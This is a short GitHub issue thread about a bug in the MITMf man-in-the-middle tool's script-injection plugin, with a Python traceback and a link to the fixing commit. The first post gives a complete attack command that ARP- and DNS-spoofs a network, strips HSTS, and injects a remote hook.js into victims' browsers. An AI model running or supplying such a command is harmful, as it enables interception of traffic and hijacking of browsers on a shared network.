### ISSUE TITLE
js-url not working [ProxyPlugins] Exception occurred in hooked function

### ISSUE THREAD

**Issue by BoBeR182** [byt3bl33d3r/MITMf#349]
mitmf --spoof --arp --dns --hsts -i wlan0 --gateway 192.168.0.1 --inject --js-url http://192.168.0.24:3000/hook.js

2016-10-14 09:25:19 192.168.0.23 [type:Firefox-49 os:Windows 7] prom.projectfreetv.at
2016-10-14 09:25:19 [ProxyPlugins] Exception occurred in hooked function
Traceback (most recent call last):
  File "/usr/share/mitmf/core/proxyplugins.py", line 112, in hook
    a = f(**args)
  File "/usr/share/mitmf/plugins/inject.py", line 65, in response
    mime = response.headers['Content-Type']
AttributeError: ClientRequest instance has no attribute 'headers'

**Comment by BoBeR182** [comment]
Fixed in https://github.com/byt3bl33d3r/MITMf/commit/2dc1dd4f1260c34d168d25c0b387980ca3a2b247
